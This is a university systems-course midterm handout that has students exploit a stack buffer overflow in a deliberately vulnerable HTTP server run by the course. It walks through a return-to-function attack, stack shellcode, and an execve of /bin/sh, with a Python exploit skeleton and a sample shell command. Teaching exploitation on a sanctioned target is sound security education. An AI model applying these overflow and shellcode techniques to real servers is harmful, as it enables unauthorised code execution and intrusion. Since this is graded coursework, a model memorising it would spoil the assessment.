This midterm is nocollab. You may not discuss anything about it with other students. You may get ticketing help from course staff, but we will not be holding office hours this week. The code required for this midterm is a smallish number of lines, but the conceptual understanding is very important. We are happy to help significantly, but we do not want to be pressured to look at code.
Introduction
Over the past few weeks, we have discussed representation, assembly, the stack, and buffer overflows. In this midterm, you will put all of this together to hack into one of our servers.
Please be advised: At the end of this midterm, an arbitrary subset of students will be asked to complete an oral interview explaining their code as part of the assignment. Students could be selected for any reason, including to ensure understanding or because course staff thinks the code is really cool.
These interviews are expected to last about 15 minutes, and your code will be available to you throughout. If you are called to interview, course staff will contact you to schedule a time, and your grade will be held until the interview is completed.
Setup
As usual, you should register for the assignment by going to https://grinch.caltech.edu/register, which will create a repository on GitLab with the starter code for you.
The Scenario
John is a recently graduated CS major who is working for Adventures Incorporated (tm). He was tasked with creating their website which he finally got running here:
http://adventure.com.puter.systems/index.html
Unfortunately, John didn’t go to Caltech or learn about systems, so he used a small HTTP server called tiny that he found on the internet:
https://gitlab.caltech.edu/john/adventures-tiny-server
Even more unfortunately, John was having problems getting the “save progress” feature working. So, he wrote some debugging code and accidentally left it in production…
Your Task
Your task for this midterm is to write several buffer overflow exploits in tiny to get various forms of your password onto the server. By the end of this midterm, you will have arbitrary code execution on the remote machine. Please remember the honor code here: you will be able to delete other students’ progress, but we expect you not to do this. To make this as realistic as possible, we are relying heavily on the honor code for this one. Please don’t take advantage.
The open-ended questions in this document are part of your grade on this midterm. Make sure to submit your answers on Gradescope!!! You may submit as many times as you want.
Orienting Yourself
The first thing you’ll have to do for this assignment is explore the webserver you’ll be hacking. tiny is set up to give a directory listing if you access a path that matches the structure of the files on the server. This is a standard web server feature that should usually be turned off, but not on John’s website! If you access the root (the website without index.html), it will list the root directory. Several directories are “forbidden” (namely, config and tokens), and these are the ones you will be hacking.
The webserver has been run from the /hackme/tiny directory. For example, if you run ls on the config directory, you’d get the following:
All the other files in /hackme/tiny are also useful, but we’ll let you explore them yourself.
In particular, you might find it useful to download the binary itself (consider using wget URL_FOR_TINY), which John helpfully called tiny and left in the root directory of the website. This binary should run and be gdb-able on labradoodle.
Throughout this midterm, we will refer to your “password”. All passwords for this midterm are 10 characters long.
There are three “stages” to this midterm, and we strongly recommend you complete them in order:
- Put a token in the /hackme/tiny/tokens folder with no contents and a name computed by sha256(“adamtoken=PASSWORD”).
- Put a token in the /hackme/tiny/tokens folder with no contents and a name computed by sha256(ADMIN_PASSWORD + “token=PASSWORD”), where ADMIN_PASSWORD is the contents of the /hackme/tiny/config/admin_token file.
- Put a token in the /hackme/tiny/tokens folder with the contents computed by sha384(“YOUR_USERNAME”) and a name of PASSWORD.
The attacks necessary to get these results get increasingly difficult. We will, however, explain the exploits you should be writing for each stage. Determining what code is exploitable is not a major goal of this midterm; instead, we will focus on actually writing the attacks once an exploit has been identified.
HTTP Requests and Responses
When you type a URL into your browser, it communicates with the remote server via an “HTTP request” which looks like this example:
GET / HTTP/1.1
Host: www.example.com
Connection: close
This request is made up of several sections:
- The “status line”, which is itself made up of three pieces separated by single spaces:
  - The “method” (or type) of the request. We will only be dealing with GET requests, which are what your browser sends when you type a URL into Chrome.
  - The “URI” (or path) of the request. This tells the server what to serve back.
  - The protocol name. We will be using HTTP/1.1 exclusively.
- A list of “headers” that provide information to the server about how to serve the content. The HTTP specification requires a Host line, but tiny will ignore all headers anyway, so there is no reason to send one.
- An empty line that indicates the end of the headers.
- Arbitrary data that is used as the “body” of the request. For our purposes, this is where the password will be read from.
As a raw string, the HTTP request above looks like:
b"GET / HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n\r\n"
Notice the \r\n after the first line, the \r\n between headers, and the trailing \r\n\r\n before any data (of which this request has none).
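The structure above can be checked by taking the example request apart with ordinary bytes operations. The sketch below uses no course code. It splits the request at the first blank line, then splits the status line on spaces.

```python
RAW = b"GET / HTTP/1.1\r\nHost: www.example.com\r\nConnection: close\r\n\r\n"

# Everything before the first \r\n\r\n is the status line plus headers;
# everything after it is the body.
head, _, body = RAW.partition(b"\r\n\r\n")
status_line, *headers = head.split(b"\r\n")
method, uri, protocol = status_line.split(b" ")

print(method, uri, protocol)  # b'GET' b'/' b'HTTP/1.1'
print(headers)                # [b'Host: www.example.com', b'Connection: close']
print(body)                   # b''
```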
Also notice the b in front of the string; this indicates that it is a byte string. For our purposes, all you really need to know is that (1) we should always use byte strings when sending over a connection, and (2) you can concatenate them like regular strings.
This midterm will require manipulating raw HTTP requests, so we have drafted a little python3 script for you that sends a request to www.example.com and prints out the data sent back. Note that this script isn’t actually complete: you need to put the pieces of the request together on the line that assigns request.
example-request.py
import socket
METHOD = b"GET"
URL = b"/"
HEADERS = b"Host: www.example.com"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# By default, web browsers request unencrypted websites on port 80.
# We want to simulate a "default" request here.
client.connect(("example.com", 80))
request = b"PUT TOGETHER THE PIECES HERE. DON'T FORGET TO USE \r\n's!"
print(request)
client.send(request)
response = client.recv(4096)
print(response.decode())
Task 0.
Start by completing the example-request.py script (given above). Then, try running it on labradoodle to see what the output looks like, because you will be looking at a lot of output like it…
Note that if your output says “HTTP Version Not Supported”, you’ve done something wrong!
Uh Oh, Buffer Overflow…
Consider the following snippet of code, which can be found in eat.c (part of the tiny webserver). Note that HEADERS_SIZE is a constant defined elsewhere.
eat.c
int eat_headers() {
char garbage[HEADERS_SIZE];
i = 0;
garbage[0] = getc(stream);
i++;
garbage[1] = getc(stream);
i++;
garbage[2] = getc(stream);
i++;
garbage[3] = getc(stream);
while (garbage[i - 3] != '\r' || garbage[i - 2] != '\n' ||
garbage[i - 1] != '\r' || garbage[i] != '\n') {
i++;
garbage[i] = getc(stream);
}
return 1;
}
As advertised, this function “eats” (reads and discards) the HTTP headers of a connection called stream. tiny is not written very well, and stream and i are both global variables. Unfortunately (or fortunately for us!), this code is susceptible to a buffer overflow attack: the loop keeps writing into garbage until it sees \r\n\r\n and never checks i against HEADERS_SIZE.
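To see exactly which bytes end up in garbage, it can help to model the loop in Python. The sketch mirrors the C code's indexing. It assumes that another part of tiny has already consumed the request line, so the stream starts at the headers. It also differs from the real loop at end of input. The getc loop would store EOF (-1, truncated to 0xff) and keep going, while this model simply raises IndexError.

```python
def simulate_eat_headers(stream: bytes) -> bytes:
    """Return every byte eat_headers would write into garbage[] (and past it)."""
    # garbage[0..3] are filled before the loop, leaving i == 3
    garbage = bytearray(stream[:4])
    i = 3
    # Keep reading until the last four bytes written are \r\n\r\n
    while garbage[i - 3:i + 1] != b"\r\n\r\n":
        i += 1
        garbage.append(stream[i])
    return bytes(garbage)

print(simulate_eat_headers(b"AAAA\r\n\r\nbody"))  # b'AAAA\r\n\r\n'
```

The terminating \r\n\r\n is itself written into memory, and anything after it (such as the body) is left in the stream.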
Converting an Address Into Bytes
When writing exploit strings, it is often very important to convert between a numerical address and the corresponding string made up of raw bytes.
Hex Number: | 0xdeadbeef |
Raw String: | b'\xef\xbe\xad\xde\x00\x00\x00\x00' |
Notably, the order of the bytes in the raw string is backwards, because we’re working on a little-endian machine. This can be very annoying to do by hand; luckily, python3 gives us a function that makes it easy:
def to_bytes(i, l=8):
return int.to_bytes(i, length=l, byteorder='little')
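As a quick usage check, the helper reproduces the table above, and int.from_bytes reverses the conversion. A value that does not fit in l bytes raises OverflowError rather than being silently truncated.

```python
def to_bytes(i, l=8):
    # Encode integer i as l bytes, least significant byte first
    return int.to_bytes(i, length=l, byteorder='little')

raw = to_bytes(0xdeadbeef)
print(raw)  # b'\xef\xbe\xad\xde\x00\x00\x00\x00'

# Decoding the same bytes little-endian recovers the original number
print(hex(int.from_bytes(raw, byteorder='little')))  # 0xdeadbeef
```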
We strongly recommend that any python scripts you write or use for this midterm are executed with python3, NOT python2!
From HTTP Request to Exploit
All three attacks you will write involve preparing exploit strings of varying complexity. Usually, they will consist of two pieces: (1) padding bytes and (2) a return address. We will send these in the headers of the HTTP request, because eat_headers has the bug we’re exploiting. All together, the core of the script you’ll be writing looks like this:
sploit.py
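import socket

def to_bytes(i, l=8):
    # Convert integer i into l little-endian bytes
    return int.to_bytes(i, length=l, byteorder='little')

# Method should always be GET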
METHOD = b"GET"
# We don't care what URL we're grabbing; they all have the possibility of exploit...
URL = b"/"
# Figure out how many bytes we need to pad until we get to the return address
# on the stack. (Hint: It's not 10...)
N = 10
PADDING = b"\xff" * N
# Fill this in with the address you actually want instead of `0xdeadbeef`
ADDRESS = to_bytes(0xdeadbeef)
# The "exploit string" is what we send in as the headers
HEADERS = PADDING + ADDRESS
# The functions we call will often look in the request's data for a password.
# So, we send it here.
DATA = b"YOUR_PASSWORD"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("adventure.com.puter.systems", 80))
request = b"PUT TOGETHER THE PIECES HERE. DON'T FORGET TO USE \r\n's!"
print(request)
client.send(request)
response = client.recv(4096)
print(response.decode())
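Any exploit string needs to respect two properties of eat_headers. First, the loop copies NUL bytes without complaint, so the zero bytes that to_bytes produces are fine. Second, the loop stops at the first \r\n\r\n, so that sequence must not appear before the real end of the headers. The helper below is a hypothetical sanity check for the second property. build_headers is our own name and is not part of the starter code. The padding length in the usage line is a placeholder.

```python
def to_bytes(i, l=8):
    return int.to_bytes(i, length=l, byteorder='little')

def build_headers(padding_len: int, address: int) -> bytes:
    """Padding followed by a little-endian return address (hypothetical helper)."""
    headers = b"\xff" * padding_len + to_bytes(address)
    # The request adds \r\n\r\n after the headers; eat_headers must first see
    # that sequence exactly there, or the tail of the exploit never reaches memory.
    if (headers + b"\r\n\r\n").find(b"\r\n\r\n") != len(headers):
        raise ValueError("exploit string ends eat_headers early")
    return headers

print(build_headers(10, 0xdeadbeef))
```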
Stage 1: Return to a function (20 points)
In this exploit, you will change a return address on the stack to make tiny execute a different function of your choice.
Task 1.
Your goal in this first exploit is to put a token in the /hackme/tiny/tokens folder with no contents and a name computed by sha256(“adamtoken=PASSWORD”). Luckily, there is a function in the source code of tiny (utils.c, specifically) that does precisely this.
Somehow get the source file utils.c, and find a function that does what you want (Hint: It’s called update_stage1_grade).
Then, download the tiny binary and use a tool like cs24-dasm to figure out (1) where the function you want to call is located, and (2) how big the buffer you’re exploiting is.
Then, create an exploit string which overwrites the return pointer with the address of the function you want to call and send it to the server.
tiny will read the “body” of the request as your password, so make sure to include the DATA variable at the very end of your request (after the \r\n\r\n).
The “padding” in your exploit may not be what it initially looks like it should be. When trying to figure out how much padding to use, we’d recommend looking at the first location on the stack that the code reads into.
If you’ve successfully made a correct exploit, the server will respond with a message indicating so.
After you think you’ve sent it correctly, go to http://adventure.com.puter.systems/debug.html and enter your password to check that the system registered it.
Stage 1.5: Running Your Own tiny (0 points)
We will need to get some information about tiny as it executes, so we’ll have to get our own instance of tiny running on labradoodle.
Making tiny Executable
In the last stage, you downloaded tiny, but if you tried to run it you might have gotten an error message (-bash: ./tiny: Permission denied). This is because we need to mark the file as “executable”.
To do this, run chmod +x tiny. Now, you’ll be able to run tiny on your own. Note that tiny takes one argument, the port to run it on. Choose (and remember!) some number larger than 9000 as this argument. However, to capture debugging information, we’ll need to use a debugger.
Using gdb to inspect tiny while it runs
We have a short gdb tutorial, which can be found here; we recommend you read it before continuing.
Here is an example gdb session during which we run tiny and determine the address at which the clientaddr variable in the accept_connection function is stored:
Why Bother?
In the next stage, we will need the address of the garbage buffer in eat_headers. The process for getting the address of this buffer is very similar to our example. You should follow approximately the same steps with the following exceptions:
- Set a breakpoint on eat_headers instead of accept_connection.
- After running tiny in gdb by typing run PORT, it will hang, because it’s waiting for a connection. You can create a connection by opening a new terminal (don’t close the old one!) and running the command wget labradoodle.caltech.edu:PORT.
- After execution stops, you will be in the eat_headers function and ready to print out the address of the garbage buffer.
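While you are stopped in eat_headers, the same session can cross-check the padding length from Stage 1. print &garbage shows the buffer's address, and info frame lists where the saved rip is stored (under “Saved registers”). The difference between the two is the number of bytes to write before the return address. The addresses below are made up, so substitute the ones gdb prints for you.

```python
# Hypothetical values copied from a gdb session; replace them with your own
GARBAGE_ADDR = 0x7fffffffe0a0    # from: print &garbage
SAVED_RIP_ADDR = 0x7fffffffe1b8  # from: info frame ("rip at ...")

# Number of bytes between the start of garbage and the saved return address
N = SAVED_RIP_ADDR - GARBAGE_ADDR
print(N)  # 280
```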
Stage 2: Return to your own code (45 points)
In the first stage, we caused execution to jump to an existing function and run it. This is already really powerful, but we can do better! What if, instead of jumping to code that exists, we jumped to our own code? In this exploit, you will cause tiny to jump to code of your own design, which will call several existing functions to complete your goal.
Shellcode
At its core, code is just executable bytes at a memory location. Remember that eat_headers helpfully reads the bytes we send onto the stack.
So, is there any reason we can’t execute bytes on the stack? In the first attack, we replaced the return address with the address of a particular function, but this time, we’ll replace it with the address where our code will be…on the stack. Just as you had to carefully count bytes to calculate where to put the address, this time you will need to do a similar count to figure out where you’re putting the bytes that represent your code. This will be some kind of offset from garbage’s address as calculated in the previous stage.
The “code” that we write as an exploit is usually called “shellcode”; it’s named that way, because the goal of the shellcode is usually to start a shell. In stage 3, we will do exactly this!
(N.B. In the real world, a new protection (an “NX bit”) was put in place to avoid exactly what we’re about to do, but it’s turned off for the purposes of this midterm.)
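The sketch below shows one possible layout under stated assumptions. It puts the shellcode at the very start of garbage and fills the space up to the saved return address with nop bytes (0x90). It then overwrites the return address with garbage's own address. The function name and the example values are hypothetical placeholders for what you measured. Placing the code elsewhere, for example after the return address, also works, as long as the address you return to points at it. Either way, the shellcode must not contain \r\n\r\n.

```python
def to_bytes(i, l=8):
    return int.to_bytes(i, length=l, byteorder='little')

def build_shellcode_headers(shellcode: bytes, garbage_addr: int, n: int) -> bytes:
    """Shellcode at garbage[0], nop padding up to byte n, then the address of
    garbage itself as the new return address (hypothetical helper)."""
    if len(shellcode) > n:
        raise ValueError("shellcode does not fit before the return address")
    padding = b"\x90" * (n - len(shellcode))  # 0x90 is the one-byte x86 nop
    return shellcode + padding + to_bytes(garbage_addr)

# Placeholder shellcode (0xcc is int3, a breakpoint trap) and made-up numbers
print(build_shellcode_headers(b"\xcc", 0x7fffffffe0a0, 16))
```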
Absolute Calls
You will likely find yourself trying to callq a particular address in this exploit. Unfortunately, if you try this naively, like so:
bad-call.s
callq *$0xdeadbeef
The assembler rejects this instruction with an error: you cannot directly call an absolute immediate address. Instead, you must put the address in a register first, like this:
better-call.s
movq $0xdeadbeef, %rax
callq *%rax
Note that you should use cs24-dasm or gdb to get the actual bytes of the shellcode you write after assembling it with as.
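Once you have a disassembly listing, you can paste its hex bytes into a Python script with bytes.fromhex, which ignores the spaces between bytes. The listing below only illustrates what assembling better-call.s might produce. Always copy the bytes from your own cs24-dasm or gdb output rather than trusting these.

```python
# Illustrative hex bytes in the style of a disassembly listing; use your own
LISTING = "48 b8 ef be ad de 00 00 00 00 ff d0"

shellcode = bytes.fromhex(LISTING)
print(shellcode)       # b'H\xb8\xef\xbe\xad\xde\x00\x00\x00\x00\xff\xd0'
print(len(shellcode))  # 12
```

The resulting bytes object can be concatenated directly with padding and an address, like any other byte string.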
With a careful application of these concepts, you have enough to write this exploit!
Task 2.
Put a token in the /hackme/tiny/tokens folder with no contents and a name computed by sha256(ADMIN_PASSWORD + “token=PASSWORD”), where ADMIN_PASSWORD is the contents of the /hackme/tiny/config/admin_token file.
To do this, you will first find a function that gets the admin token, and then feed it to another function that takes the sha256 of its arguments. Once again, you should look in utils.c for the requisite functions. Then, once you’ve found the functions, write assembly to perform the correct actions, assemble it with as, put the exploit together, and send it to the server.
Stage 3: Execute a shell command (25 points)
Finally, you will implement the holy grail. In this exploit, you will force tiny to run your shellcode to load and execute a shell with a bash script of your own design.
In reality, this script could do anything you wanted. For the purposes of this midterm, it will create a file on the file system.
System Calls and the syscall Instruction
A system call is a request to the operating system (specifically, the kernel) to complete an operation for the user program. You’ve used many system calls without knowing it; all file operations, for example, are at their core system calls. We’ll talk much more about these later, but for now it suffices to know that if we want to execute a program, we can ask the OS to do it for us using the execve system call.
Because we’re writing shellcode, we need to know how to request a system call from assembly. To do this, one uses the syscall instruction, which behaves very similarly to callq except that it takes its arguments in different registers. Every syscall has a “number” that tells the OS which operation to complete. A full list can be found at https://filippo.io/linux-syscall-table/. For our purposes, we will only care about exit (which is #60) and execve (which is #59).
Use the following registers to complete a syscall:
Syscall # | Param 1 | Param 2 | Param 3 | Param 4 | Param 5 | Param 6 |
%rax | %rdi | %rsi | %rdx | %r10 | %r8 | %r9 |
For example, to complete an exit(0) system call, we’d write the following x86-64 code (in GNU as syntax, comments start with #, because ; separates statements):
movq $60, %rax    # use the exit syscall
movq $0, %rdi     # exit status 0
syscall           # make syscall
The execve System Call
To really understand what execve is doing, we must understand processes, which we won’t get to until later. So, we’ll provide a working definition that will be enough for the current assignment.
execve() executes the program pointed to by filename. This causes the program that is currently being run by the calling process to be replaced with a new program, with newly initialized stack, heap, and (initialized and uninitialized) data segments. The execve system call has the following signature:
int execve(const char *filename, char *const argv[], char *const envp[]);
- filename is the full path to the executable to run.
- argv is a NULL-terminated array of pointers to strings indicating what arguments to run filename with. Note that execve will expect the first argument to be a repeat of the path to the binary to execute.
- envp is a NULL-terminated array of pointers to strings indicating the “environment” to run the program in. For our purposes, we will always pass in {NULL} (i.e., an empty environment).
Notably, since we will be making a syscall to execve in assembly, we will have to manually set up all arguments (and their contents and pointers)! Getting those right will be the hardest part of this exploit!
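To make “NULL-terminated array of pointers” concrete, here is a Python model of how such an argv could sit in memory. It places the NUL-terminated strings first, then an array of 8-byte little-endian pointers to them, then a zero pointer. The base address is hypothetical. If a blob like this were embedded in an exploit string, its base would be some offset from garbage's address. Building the same structure with stack pushes in assembly is an equally valid approach. The final zero slot is itself a one-element array containing NULL, so its address can also serve as envp.

```python
def to_bytes(i, l=8):
    return int.to_bytes(i, length=l, byteorder='little')

def layout_argv(strings, base):
    """Lay out NUL-terminated strings starting at `base`, followed by a
    NULL-terminated array of pointers to them. Returns (blob, argv_addr)."""
    blob = b""
    addrs = []
    for s in strings:
        addrs.append(base + len(blob))  # where this string will live
        blob += s + b"\x00"             # C strings end in a NUL byte
    blob += b"\x00" * (-len(blob) % 8)  # 8-byte-align the pointer array (tidy, not required)
    argv_addr = base + len(blob)
    for a in addrs:
        blob += to_bytes(a)
    blob += to_bytes(0)                 # the terminating NULL pointer
    return blob, argv_addr

# Hypothetical base address and a harmless example command
blob, argv_addr = layout_argv([b"/bin/echo", b"hi"], 0x1000)
print(hex(argv_addr), len(blob))  # 0x1010 40
```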
Shells and Shell Scripts
When you type into a terminal, a program (called a “shell”) interprets what you write and executes the commands you type. (Incidentally, it does this using the execve syscall from above…) Specifically, the shell program most commonly used is called sh (or bash) and can be found at /bin/sh on most machines. This is the program that you will be execve-ing using your h4x0r skillz! In particular, since you are trying to put a token with particular contents and a particular name, the shell script you will want to run is:
/bin/sh -c 'echo -n "USERNAME" | sha384sum > /hackme/tiny/tokens/PASSWORD'
Note that /bin/sh is the name of the program, and -c and the rest of the line are its two arguments. Do not include the quotes around the second argument in your exploit. That is, your arguments array to execve should look like {"/bin/sh", "-c", "echo -n USERNAME | sha384sum > /hackme/tiny/tokens/PASSWORD", NULL}.
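Python's shlex module applies POSIX shell quoting rules, so you can use it to confirm how that command line splits into arguments. The single quotes disappear, and everything between them becomes the single third argument. The double quotes around USERNAME survive inside that argument. /bin/sh removes them again when it runs the script, which is why the version without them in the array above behaves the same for a plain username.

```python
import shlex

command = """/bin/sh -c 'echo -n "USERNAME" | sha384sum > /hackme/tiny/tokens/PASSWORD'"""
argv = shlex.split(command)
print(argv)
# ['/bin/sh', '-c', 'echo -n "USERNAME" | sha384sum > /hackme/tiny/tokens/PASSWORD']
```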
As you have likely gathered at this point, if you can execve /bin/sh, you can send whatever command you want to do whatever nasty things you want on a machine!
Putting it all together
Task 3.
Write shellcode that execve’s /bin/sh with the provided arguments (“shell script”). Then, force tiny to execute your shellcode by returning to it like before. Your shellcode should put a token in the /hackme/tiny/tokens folder with the contents computed by sha384(YOUR_USERNAME) and a name of PASSWORD.
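If you can read the token file back, you can compare it with a locally computed value. When sha384sum reads standard input, it prints the hex digest, two spaces, and “-” (its name for stdin), followed by a newline. The sketch below assumes that /bin/sh on the server honors echo -n, so that the username is hashed without a trailing newline. The username in the usage line is a placeholder.

```python
import hashlib

def expected_token_contents(username: bytes) -> str:
    # Mirrors `echo -n USERNAME | sha384sum`: "<hex digest>  -" plus a newline
    return hashlib.sha384(username).hexdigest() + "  -\n"

print(expected_token_contents(b"YOUR_USERNAME"), end="")
```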
Did you remember to submit your answers to the open-ended questions on Gradescope???
You must upload your code to GitLab by the due date. In particular, we will redownload your repository’s stage1.py, stage2.py, and stage3.py and run them by themselves to verify your work for credit.
- Your script must connect to adventure.com.puter.systems on a port between 10000 and 10025.
- Your script should be able to run without any issues by itself.
- The script must be able to run without any arguments.
- No third-party imports or importing from other scripts.
- If you choose to do the extra credit, it should be in a separate file, not stage3.py.
Extra Credit: Proof of Arbitrary Code Execution (+5 points)
Given that the third task gives you a shell, you now have arbitrary code execution. To prove that you understand what you’ve done, add a new link to the index.html page, as well as a corresponding directory and index.html page for your link. Make sure to sign the page in some way that lets us figure out who you are.